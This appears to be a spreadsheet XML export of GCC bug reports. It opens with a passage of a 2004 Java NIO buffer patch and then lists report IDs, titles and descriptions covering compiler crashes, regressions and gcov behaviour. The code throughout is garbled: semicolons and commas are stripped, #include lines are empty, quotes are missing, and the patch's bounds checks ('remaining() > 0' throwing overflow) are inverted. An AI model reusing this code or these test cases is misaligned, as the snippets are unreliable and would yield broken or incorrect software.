@@ -1347 +14210 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1527 +1637 @@
         || index &gt;= limit ())
       throw new IndexOutOfBoundsException ()
-    return backing_buffer [index]
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1727 +1837 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/DoubleBufferImpl.java nio/DoubleBufferImpl.java
--- nio.orig/DoubleBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/DoubleBufferImpl.java	Fri May 14 11:42:37 2004
@@ -9710 +9716 @@
   /**
    * Relative get method. Reads the next double from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public double get ()
   {
-    double result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    double result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1096 +1158 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public DoubleBuffer put (double value)
@@ -1167 +12410 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1307 +14110 @@
    */
   final public double get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1467 +16010 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/FloatBufferImpl.java nio/FloatBufferImpl.java
--- nio.orig/FloatBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/FloatBufferImpl.java	Fri May 14 11:42:37 2004
@@ -9710 +9716 @@
   /**
    * Relative get method. Reads the next float from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public float get ()
   {
-    float result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    float result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1096 +1158 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public FloatBuffer put (float value)
@@ -1167 +12410 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1307 +14110 @@
    */
   final public float get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1467 +16010 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/IntBufferImpl.java nio/IntBufferImpl.java
--- nio.orig/IntBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/IntBufferImpl.java	Fri May 14 11:42:37 2004
@@ -9710 +9716 @@
   /**
    * Relative get method. Reads the next int from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public int get ()
   {
-    int result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    int result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1096 +1158 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public IntBuffer put (int value)
@@ -1167 +12410 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1307 +14110 @@
    */
   final public int get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1467 +16010 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/LongBufferImpl.java nio/LongBufferImpl.java
--- nio.orig/LongBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/LongBufferImpl.java	Fri May 14 11:42:37 2004
@@ -9710 +9716 @@
   /**
    * Relative get method. Reads the next long from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public long get ()
   {
-    long result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    long result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1096 +1158 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public LongBuffer put (long value)
@@ -1167 +12410 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1307 +14110 @@
    */
   final public long get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1467 +16010 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/ShortBufferImpl.java nio/ShortBufferImpl.java
--- nio.orig/ShortBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/ShortBufferImpl.java	Fri May 14 11:42:37 2004
@@ -9710 +9716 @@
   /**
    * Relative get method. Reads the next short from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public short get ()
   {
-    short result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    short result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1096 +1158 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public ShortBuffer put (short value)
@@ -1167 +12410 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1307 +14110 @@
    */
   final public short get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1467 +16010 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
--- cut here ------
I hope this help.</t>
  </si>
  <si>
    <t>denis.walesch</t>
  </si>
  <si>
    <t>GCC-36898</t>
  </si>
  <si>
    <t>Insufficient qp-mutex declarations</t>
  </si>
  <si>
    <t>The attached test case is causing a spurious dependency violation message from the assembler.  The problem seems to be that the assembler is clearing all qp mutex relations after a call but the compiler does not emit .pred.rel.mutex after them.
$ gcc -O2 -c -save-temps xdisp.c
xdisp.s: Assembler messages:
xdisp.s:114: Warning: Use of 'mov' may violate WAW dependency 'GR% % in 1 - 127' (impliedf) specific resource number is 16
xdisp.s:113: Warning: This is the location of the conflicting usage</t>
  </si>
  <si>
    <t>GCC-35945</t>
  </si>
  <si>
    <t>Complex module-based overloading fails</t>
  </si>
  <si>
    <t>If a type is renamed on import and then an unrenamed copy is also imported and overloaded functions are called then gfortran fails to compile with a blocked by an incompatible object error. The code compiles cleanly with {NAG ifort g95}.
Not sure if this is a bug or non-standard code though I suspect the former.
Thanks
Joanthan Hogg
Full test case:
[user@host] ~/bugs/gfortran-4.3/import_rename  $ make
gfortran-4.3  -c stype.f90
gfortran-4.3  -c dtype.f90
gfortran-4.3  -c test.f90
test.f90:15.29:
   subroutine fred(sval dval)
                            1
test.f90:16.15:
      use stype
              2
Error: The type 'overloaded_type' cannot be host associated at (1) because it is blocked by an incompatible object of the same name declared at (2)
make: *** [test.o] Error 1
[user@host] ~/bugs/gfortran-4.3/import_rename  $ gfortran-4.3 -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --program-suffix=-4.3
Thread model: posix
gcc version 4.3.0 (GCC)
[user@host] ~/bugs/gfortran-4.3/import_rename  $ cat test.f90 
program test
   use stype overloaded_type_s =&gt; overloaded_type
   use dtype overloaded_type_d =&gt; overloaded_type
   implicit none
   type(overloaded_type_s) :: sval
   type(overloaded_type_d) :: dval
   sval%part = 1
   dval%part = 2
   call fred(sval dval)
contains
   subroutine fred(sval dval)
      use stype
      type(overloaded_type_s) intent(in) :: sval
      type(overloaded_type_d) intent(in) :: dval
      call overloaded_sub(sval)
      call overloaded_sub(dval)
   end subroutine
end program
[user@host] ~/bugs/gfortran-4.3/import_rename  $ cat stype.f90 
module stype
   implicit none
   type overloaded_type
      real :: part
   end type
   interface overloaded_sub
      module procedure overloaded_sub_s
   end interface
contains
   subroutine overloaded_sub_s(otype)
      type(overloaded_type) intent(in) :: otype
      print * s type =  otype%part
   end subroutine
end module
[user@host] ~/bugs/gfortran-4.3/import_rename  $ cat dtype.f90 
module dtype
   implicit none
   type overloaded_type
      double precision :: part
   end type
   interface overloaded_sub
      module procedure overloaded_sub_d
   end interface
contains
   subroutine overloaded_sub_d(otype)
      type(overloaded_type) intent(in) :: otype
      print * d type =  otype%part
   end subroutine
end module</t>
  </si>
  <si>
    <t>GCC-35872</t>
  </si>
  <si>
    <t>[4.3 regression] incorrect code for 32bit multiplication by constant</t>
  </si>
  <si>
    <t>A 32bit multiplication by a constant results in incorrect code when compiled for some AVR models (probably those having a hardware multiplier).
Command:
  avr-gcc -mmcu=attiny25 -Os -S t1.c      (correct)
  avr-gcc -mmcu=atmega16 -Os -S t1.c      (incorrect)</t>
  </si>
  <si>
    <t>GCC-12281</t>
  </si>
  <si>
    <t>[3.4 Regression]not emiting function which is static and marked as inline</t>
  </si>
  <si>
    <t>For some reason only on *-*-darwin (both i686 and PPC) the following program does not 
emit the function f (note it works with -funit-at-a-time which is funny because most of the 
problems is caused by that also it worked on 20030814 on the mainline):
static void f(void)
void g(void (*x) (void)){x()}
static inline void f(void){}
void h(){g(f)}
int main(){h()return 0}
Note this causes bootstrap using the mainline as the base compiler to not to be able to 
complete the first stage as this is used in cppcharset.c.
It works with the c++ front-end it also works when the program is compiled with -static 
(no -fPIC or -mdynamic-no-pic).</t>
  </si>
  <si>
    <t>GCC-12969</t>
  </si>
  <si>
    <t>[3.3.2 regression] Including sys/byteorder.h breaks configure checks</t>
  </si>
  <si>
    <t>In gcc 3.3.2 the following change was made from gcc 3.3.1:
diff -ru gcc-3.3.1/gcc/fixinc/inclhack.def gcc-3.3.2/gcc/fixinc/inclhack.def
--- gcc-3.3.1/gcc/fixinc/inclhack.def   Wed Jul  2 01:47:05 2003
+++ gcc-3.3.2/gcc/fixinc/inclhack.def   Tue Oct 14 06:42:40 2003
@@ -29719 +29710 @@
 /*
  *  Completely replace  with a file that implements gcc's
- *  optimized byteswapping.  Restricted to SVR4 machines until either
- *  it is shown to be safe to replace this file always or we get bolder -)
+ *  optimized byteswapping.
  */
 fix = {
     hackname = AAB_svr4_replace_byteorder
-#ifndef SVR5
-    mach = *-*-sysv4*
-    mach = i[34567]86-*-sysv5*
-    mach = i[34567]86-*-udk*
-    mach = i[34567]86-*-solaris2.[0-4]
-    mach = powerpcle-*-solaris2.[0-4]
-    mach = sparc-*-solaris2.[0-4]
-#endif /* SVR5 */
     files    = sys/byteorder.h
     replace  = '#ifndef _SYS_BYTEORDER_H
 \#define _SYS_BYTEORDER_H
so a new sys/byteorder.h is now generated by fixincludes. However several
configure checks for common software like openssh use the c preprocessor to
determine if a header file exists. If you run the c-preprocessor on the
following file in gcc 3.3.1 you get:
pkw@hedwig:~$ cpp --version
cpp (GCC) 3.3.1
Copyright (C) 2003 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
pkw@hedwig:~$ echo #include  &gt; test.c
pkw@hedwig:~$ cpp test.c &gt; /dev/null
pkw@hedwig:~$ echo $?
0
With gcc 3.3.2 you get:
pkw@hedwig:~$ /opt/csw/gcc3/bin/cpp --version
cpp (GCC) 3.3.2
Copyright (C) 2003 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
pkw@hedwig:~$ echo #include  &gt; test.c
pkw@hedwig:~$ /opt/csw/gcc3/bin/cpp test.c &gt; /dev/null
In file included from /usr/include/netinet/in.h:48
                 from /usr/include/netdb.h:98
                 from test.c:1:
/opt/csw/gcc3/lib/gcc-lib/sparc-sun-solaris2.8/3.3.2/include/sys/byteorder.h:26:2:
#error You lose! This file is only useful with GNU compilers.
pkw@hedwig:~$ echo $?
1</t>
  </si>
  <si>
    <t>pkw</t>
  </si>
  <si>
    <t>GCC-48698</t>
  </si>
  <si>
    <t>gnu-versioned-namespace problems</t>
  </si>
  <si>
    <t>Bootstrap fails with errors like:
/tmp/b/x86_64-unknown-linux-gnu/libstdc++-v3/include/cwchar: In function 'wchar_t* std::_6::wcschr(wchar_t* wchar_t)':
/tmp/b/x86_64-unknown-linux-gnu/libstdc++-v3/include/cwchar:215:55: error: invalid conversion from 'const wchar_t*' to 'wchar_t*' [-fpermissive]
/tmp/b/x86_64-unknown-linux-gnu/libstdc++-v3/include/cwchar:214:3: error:   initializing argument 1 of 'wchar_t* std::_6::wcschr(wchar_t* wchar_t)' [-fpermissive]
This is because the using declaration for ::wcschr is not in the versioned namespace so name lookup inside the versioned namespace finds the declaration there and doesn't look in the enclosing namespace.
Fixed by:
--- include/c_global/cwchar     2011-04-20 10:09:58.580607848 +0000
+++ include/c_global/cwchar     2011-04-20 10:11:39.348231280 +0000
@@ -1366 +1368 @@
 namespace std _GLIBCXX_VISIBILITY(default)
 {
+_GLIBCXX_BEGIN_NAMESPACE_VERSION
+
   using ::wint_t
   using ::btowc
@@ -2078 +2096 @@
   using ::wcsstr
   using ::wmemchr
-_GLIBCXX_BEGIN_NAMESPACE_VERSION
-
 #ifndef __CORRECT_ISO_CPP_WCHAR_H_PROTO
   inline wchar_t*
   wcschr(wchar_t* __p wchar_t __c)
That allows the bootstrap to finish but the choice of _6 as the inline namespace means we cannot compile this valid program or it's C++0x equivalent:
#include 
int f(int i)
int g()
{
    std::tr1::bind(f std::tr1::placeholders::_6)
}
b.cc: In function 'int g()':
b.cc:7:49: error: expected primary-expression before ')' token
The problem is that std::tr1::placeholders::_6 is a namespace not a bind placeholder
// Inline namespace for symbol versioning.
#if _GLIBCXX_INLINE_VERSION
namespace std
{
...
  namespace tr1
  {
    ...
    namespace placeholders { inline namespace _6 { } }
    ...
  }
  ...
  namespace placeholders { inline namespace _6 { } }
This won't work placeholders::_6 is required to be a bind placeholder so can't be a namespace.
It might be better to use _v6 although that would fail if users say
#define _v6 bleurgh
which is allowed.
The inline namespaces should really use a name resperved for the impl such as __6 or __v6</t>
  </si>
  <si>
    <t>GCC-34060</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid specialization of variadic template</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
==================================================
template struct A
{
  template struct B {}
  template struct B {}
}
A::B b
==================================================
bug.cc:5: error: parameter packs not expanded with `...':
bug.cc:5: note:         'T'
bug.cc:5: error: template parameters not used in partial specialization:
bug.cc:5: error:         'T'
bug.cc:8: internal compiler error: tree check: expected tree_vec have error_mark in get_innermost_template_args at cp/pt.c:514
Please submit a full bug report [etc.]
The testcase didn't crash before 2007-11-03 so it's probably fallout from
http://gcc.gnu.org/ml/gcc-cvs/2007-11/msg00120.html</t>
  </si>
  <si>
    <t>GCC-28478</t>
  </si>
  <si>
    <t>gcov is not demangling C++ names</t>
  </si>
  <si>
    <t>Since 3.4 version of GCC the functions naming in gcov seems to be changed.
When using '-f' option of gcov the function names are no more ClassName::MethodName but have C++ name mangling. For example :
=========== EXAMPLE BEGIN ===================
::::::::::::::
 myClass.h
::::::::::::::
class myClass {
 public:
  myClass(const int 
  virtual ~myClass() {}
  void testInteger()
 private:
  int m_integer
}
::::::::::::::
myClass.cpp
::::::::::::::
#include myClass.h
#include 
  void myClass::testInteger()
{
  if (m_integer &gt; 10)
    {
      std::cout  10 &lt;&lt; std::endl
    }
  else
    {
      std::cout &lt;&lt; Integer &lt;= 10 &lt;&lt; std::endl
    }
}
::::::::::::::
myTest.cpp
::::::::::::::
#include myClass.h
int main()
{
  myClass oneClass(9)
  oneClass.testInteger()
  return 0
}
=============== EXAMPLE END ====================
If I compile and execute this test :
  $ g++ --version
   g++ (GCC) 3.4.5 20051201 (Red Hat 3.4.5-2)
...
  $ g++ -fprofile-arcs -ftest-coverage *.cpp
  $ ./a.out
  Integer &lt;= 10
  $ gcov -f myClass.cpp &gt;gcov_summary
  $ more gcov_summary
   Function `_ZSt17__verify_groupingPKcmRKSs'
   Lines executed:0.00% of 11
   Function `_ZN7myClass11testIntegerEv'
   Lines executed:75.00% of 4
   Function `_ZSt3minImERKT_S2_S2_'
   Lines executed:0.00% of 4
   Function `_Z41__static_initialization_and_destruction_0ii'
   Lines executed:100.00% of 2
   Function `__tcf_0'
   No executable lines
   Function `_GLOBAL__I__ZN7myClass11testIntegerEv'
   Lines executed:100.00% of 1
   File    `/usr/lib/gcc/x86_64-redhat-linux/3.4.5/../../../../include/c++/3.4.5/bits/locale_facets.tcc'
   Lines executed:0.00% of 11
/usr/lib/gcc/x86_64-redhat-linux/3.4.5/../../../../include/c++/3.4.5/bits/locale_facets.tcc:creating  `locale_facets.tcc.gcov'
.....
The natural name of method myClass::testInteger has been changed to _ZN7myClass11testIntegerEv
This behaviour does not occur in version 3.2.3 of GCC.
It still occurs with 3.4.3 and 4.0.2 (on the same platform).
Is this a bug or a new normal behaviour ?
This naming approach does make easy post-processing of test
coverage rates especially for a large critical software.
Is there any way to fix that or to translate decorated 
function names to natural name (i.e. class::method).
Thanks for help</t>
  </si>
  <si>
    <t>snordin_ng</t>
  </si>
  <si>
    <t>GCC-49792</t>
  </si>
  <si>
    <t>OpenMP workshare: Wrong result with array assignment</t>
  </si>
  <si>
    <t>Based on the thread at http://gcc.gnu.org/ml/fortran/2011-07/msg00194.html
OpenMP 3.1 has in 2.5.4 workshare Construct (normative text):
An implementation of the workshare construct must insert any synchronization that is required to maintain standard Fortran semantics. For example the effects of one statement within the structured block must appear to occur before the execution of succeeding statements and the evaluation of the right hand side of an assignment must appear to complete prior to the effects of assigning to the left hand side.
That seems to fail for:
!$omp parallel workshare
    a(:) = a(n:1:-1)
!$omp end parallel workshare
which cannot be run in parallel as the element access on the RHS cannot be done in arbitrary order.
Possible solution: Make use of gfortran's dependency.c machinery but only look for GFC_DEP_EQUAL and GFC_DEP_NODEP - and ignore e.g. GFC_DEP_BACKWARD or GFC_DEP_FORWARD which indicate that the loop order is important.</t>
  </si>
  <si>
    <t>GCC-13968</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Internal compiler error while compiling Boost library</t>
  </si>
  <si>
    <t>gcc-3_4-branch from 2004/02/01 ca. 12:00pm PST
Configured with: ../gcc-3_4-branch/configure --prefix=/usr/local_cci/gcc-3_4-
branch_2004_02_01_1211 --enable-languages=cc++
Redhat Linux 8.0
% g++ -fPIC -ftemplate-depth-120 -w -DNDEBUG -O3 -DBOOST_PYTHON_MAX_BASES=2 -
DBOOST_PYTHON_SOURCE -I/net/worm/scratch1/rwgk/hot/boost -
I/usr/include/python2.2 -
E /net/worm/scratch1/rwgk/hot/boost/libs/python/src/dict.cpp &gt; dict_pp.cpp
% g++ -fPIC -ftemplate-depth-120 -O3 -c dict_pp.cpp
In file included 
from /net/worm/scratch1/rwgk/hot/boost/boost/mpl/advance.hpp:20
from /net/worm/scratch1/rwgk/hot/boost/boost/mpl/aux_/at_impl.hpp:21
                 from /net/worm/scratch1/rwgk/hot/boost/boost/mpl/at.hpp:22
from /net/worm/scratch1/rwgk/hot/boost/boost/python/detail/signature.hpp:20
from /net/worm/scratch1/rwgk/hot/boost/boost/python/detail/caller.hpp:16
from /net/worm/scratch1/rwgk/hot/boost/boost/python/object/function_handle.hpp:9
from /net/worm/scratch1/rwgk/hot/boost/boost/python/converter/arg_to_python.hpp:
20
from /net/worm/scratch1/rwgk/hot/boost/boost/python/call.hpp:16
from /net/worm/scratch1/rwgk/hot/boost/boost/python/object_core.hpp:13
from /net/worm/scratch1/rwgk/hot/boost/boost/python/object.hpp:10
from /net/worm/scratch1/rwgk/hot/boost/boost/python/dict.hpp:11
from /net/worm/scratch1/rwgk/hot/boost/libs/python/src/dict.cpp:1:
/net/worm/scratch1/rwgk/hot/boost/boost/mpl/negate.hpp:38: internal compiler 
error: in uses_template_parms at cp/pt.c:4748
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I will attach the preprocessed source code. The same file and a tar.gz file 
with the complete boost CVS tree (most current HEAD) are also available here:
http://cci.lbl.gov/~rwgk/bugs/gcc340/dict_pp.cpp.gz
http://cci.lbl.gov/~rwgk/bugs/gcc340/boost_2004_02_01_1526.tar.gz</t>
  </si>
  <si>
    <t>GCC-1241</t>
  </si>
  <si>
    <t>Internal Compiler Error. Can't build libgcj</t>
  </si>
  <si>
    <t xml:space="preserve">From: Bryce McKinlay 
To: torsten.rueger@firsthop.com
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/210: Internal Compiler Error. Can't build libgcj
Date: Tue 18 Apr 2000 23:33:58 +1200
 torsten.rueger@firsthop.com wrote:
 &gt; RedHat 6.1 on PC
 &gt; &gt;Description:
 &gt; gcj -fassume-compiled -g -L/var/tmp/build/i686-pc-linux-gnu/libjava -ffloat-store -c  -fPIC ../../../libgcj/libjava/gnu/gcj/convert/Input_UTF8.java -o gnu/gcj/convert/.libs/Input_UTF8.lo
 &gt; ../../../libgcj/libjava/gnu/gcj/convert/Input_UTF8.java: In class `gnu.gcj.convert.Input_UTF8':
 &gt; ../../../libgcj/libjava/gnu/gcj/convert/Input_UTF8.java: In method `read(char[]intint)':
 &gt; ../../../libgcj/libjava/gnu/gcj/convert/Input_UTF8.java:112: Unrecognizable insn:
 &gt; (insn 135 133 136 (set (reg:SI 51)
 &gt;         (UnKnown Unknown)) -1 (nil)
 &gt;     (nil))
 &gt; ../../../libgcj/libjava/gnu/gcj/convert/Input_UTF8.java:112: Internal compiler error in `extract_insn' at recog.c:2044
 &gt; Please submit a full bug report.
 Hi Torsten
 This is a known bug that was fixed recently (about 5 days ago) in the compiler. I have just checked out and built the latest libgcj and gcc from cvs and I do not see this bug anymore.
 (There is currently a problem with java.sql.Date but this goes away on the second time you type 'make').
 Please check that you are using the latest compiler and try again. If you still have problems I suggest trying my patch for gcc-2.95.2 which will allow you to use it with the latest
 libgcj. see http://waitaki.otago.ac.nz/~bryce/gcj
 regards
   [ bryce ]
</t>
  </si>
  <si>
    <t>torsten.rueger</t>
  </si>
  <si>
    <t>GCC-49017</t>
  </si>
  <si>
    <t>[avr] -ffunction-sections causes linker to fail</t>
  </si>
  <si>
    <t>I was compiling my code with -ffunction-sections for quite some time so not sure why this problem now constantly appears when using this flag. I have a toolchain compiled with crossdev -t avr on gentoo which means gcc-4.5.2 at the moment. When linking my object file with other files __muldi3 from libgcc.a is linked incorrectly.
Attaching pre-linking (nol*) &amp; post-linking (obj*) object files. I'm not really sure about what to provide so please let me know what you need.
Stefan</t>
  </si>
  <si>
    <t>stefan.hladnik</t>
  </si>
  <si>
    <t>GCC-57586</t>
  </si>
  <si>
    <t>ICE when expanding volatile asm using unaligned pointer</t>
  </si>
  <si>
    <t>Created attachment 30290
Reduced testcase
Using built-in specs.
COLLECT_GCC=../build-arm-none-eabi/install/bin/arm-none-eabi-gcc
COLLECT_LTO_WRAPPER=/work/build-arm-none-eabi/install/libexec/gcc/arm-none-eabi/4.9.0/lto-wrapper
Target: arm-none-eabi
Configured with: /work/src/gcc/configure --target=arm-none-eabi --prefix=/work/build-arm-none-eabi/install --with-gmp=/work/build-arm-none-eabi/host-tools --with-mpfr=/work/build-arm-none-eabi/host-tools --with-mpc=/work/build-arm-none-eabi/host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=cc++ --with-newlib
Thread model: single
gcc version 4.9.0 20130326 (experimental) (unknown)
../build-arm-none-eabi/install/bin/arm-none-eabi-gcc ../testcases/pr-reduced.c -O1
../testcases/pr-reduced.c: In function 'foo':
../testcases/pr-reduced.c:12:3: error: output number 0 not directly addressable
   __asm__ __volatile__(: +m (c-&gt;x) : r (
   ^
../testcases/pr-reduced.c:12:3: internal compiler error: in expand_asm_operands at stmt.c:910
0x8c1be8 expand_asm_operands
	/work/oban-dev/src/gcc/gcc/stmt.c:910
0x8c28a7 expand_asm_stmt(gimple_statement_d*)
	/work/oban-dev/src/gcc/gcc/stmt.c:1151
0x5dfe5f expand_gimple_stmt_1
	/work/oban-dev/src/gcc/gcc/cfgexpand.c:2154
0x5dfe5f expand_gimple_stmt
	/work/oban-dev/src/gcc/gcc/cfgexpand.c:2309
0x5e1b69 expand_gimple_basic_block
	/work/oban-dev/src/gcc/gcc/cfgexpand.c:4143
0x5e4a33 gimple_expand_cfg
	/work/oban-dev/src/gcc/gcc/cfgexpand.c:4662
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
No difference with -mno-unaligned-access or -maligned-access.
A manifestation of this bug prevents a Linux Kernel build.</t>
  </si>
  <si>
    <t>GCC-23487</t>
  </si>
  <si>
    <t>Assignment from incompatible pointer warning in __gnat_install_handler kills bootstrap</t>
  </si>
  <si>
    <t>stage1/xgcc -Bstage1/ -B/home/4/wilx/i386-unknown-freebsd4.10/bin/ -c   -O2 -g
-fomit-frame-pointer -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes    -Werror -fno-common   -DHAVE_CONFIG_H    \
         -I/home/4/wilx/include   -I. -Iada -I../../srcdir/gcc
-I../../srcdir/gcc/ada -I../../srcdir/gcc/../include
-I../../srcdir/gcc/../libcpp/include  ../../srcdir/gcc/ada/init.c -o ada/init.o
cc1: warnings being treated as errors
../../srcdir/gcc/ada/init.c: In function '__gnat_install_handler':
../../srcdir/gcc/ada/init.c:1601: warning: assignment from incompatible pointer type
make[2]: *** [ada/init.o] Error 1
make[2]: Leaving directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
make[1]: *** [stage2_build] Error 2
make[1]: Leaving directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
make: *** [bootstrap-lean] Error 2</t>
  </si>
  <si>
    <t>GCC-65531</t>
  </si>
  <si>
    <t>ICE: symtab_node::verify failed: Two symbols with same comdat_group are not linked by the same_comdat_group list. with -fcheck-pointer-bounds -mmpx</t>
  </si>
  <si>
    <t>Created attachment 35118
reduced testcase
Compiler output:
$ gcc -fcheck-pointer-bounds -mmpx testcase.C         
testcase.C:10:4: error: Two symbols with same comdat_group are not linked by the same_comdat_group list.
 S s
    ^
_ZN1SD1Ev.chkp/11 (S::~S(#'pointer_bounds_type' not supported by dump_type# void ...)) @0x7f52d8b0f310
  Type: function definition analyzed alias cpp_implicit_alias
  Visibility: external public weak comdat comdat_group:_ZN1SD5Ev one_only
  Same comdat group as: _ZN1SD1Ev/2
  Address is taken.
  References: _ZN1SD2Ev.chkp/10 (alias)
  Referring: _ZN1SD1Ev/2 (chkp)
  Availability: available
  First run: 0
  Function flags:
  Called by: 
  Calls: 
  Is instrumented version.
_ZN1SD2Ev.chkp/10 (S::~S(#'pointer_bounds_type' not supported by dump_type# void ...)) @0x7f52d8b0f188
  Type: function definition analyzed
  Visibility: external public weak comdat comdat_group:_ZN1SD5Ev one_only artificial
  Same comdat group as: _ZN1SD2Ev/1
  Address is taken.
  References: 
